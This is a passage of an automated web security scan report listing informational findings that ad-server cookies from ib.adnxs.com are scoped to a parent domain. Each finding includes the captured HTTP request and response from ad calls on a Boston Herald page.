document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-48597195_1296251864,11d765b6a10b1b3,Miscellaneous,cm.cm_aa_gn1-cm.sportsreg-cm.spo
...[SNIP]...

10.76. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-83450342_1296254125%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D782666%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.1877197385765612%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb510504=5_[r^208WMuF4Lw)IE.8w)IgJ?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPwQ_cisQ0NJ6BWHfHSmrEELAQkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQENgYBAgUCAAIAAAAAlCBOvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253632%29%3Buf%28%27r%27%2C+151403%2C+1296253632%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2811%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2887%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28619%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28620%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28621%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb510504=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb437727=5_[r^208WMuF4Lw)IE.8pxVr8?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-1RhKNLepg-BWHfHSmrEEKtRENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpggBAgUCAAIAAAAA6SF9GAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254125%29%3Buf%28%27r%27%2C+151403%2C+1296254125%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2811%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2887%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28619%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28620%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28621%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:35:25 GMT
Content-Length: 834

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-83450342_1296254125,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.77. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-46060337_1296254384%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D966058%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.8368365135975182%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb437727=5_[r^208WMuF4Lw)IE.8pxVr8?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-1RhKNLepg-BWHfHSmrEEKtRENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpggBAgUCAAIAAAAA6SF9GAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254125%29%3Buf%28%27r%27%2C+151403%2C+1296254125%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2811%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2887%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28619%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28620%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28621%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb437727=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb208574=5_[r^208WMM2x@N!@@-#jWrqQ?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEPzzOLJCC5ShcBWHfHSmrEEKZcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEFwkBAgUCAAIAAAAAPyIyOwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265369%29%3Buf%28%27r%27%2C+116344%2C+1296265369%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:49 GMT
Content-Length: 833

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-46060337_1296254384,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.78. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-85794731_1296251888%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D262895%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.33319127024151385%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb402178=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb217792=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb988380=5_[r^208WMM2x@N!@@-#b8Y/6?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP7E_zwhd9VhuBWHfHSmrEEJ_cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE-gYBAgUCAAIAAAAAMyO8VAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265343%29%3Buf%28%27r%27%2C+116344%2C+1296265343%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:23 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-85794731_1296251888,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.79. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-98462601_1296252387%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D274606%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.9608076433651149%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
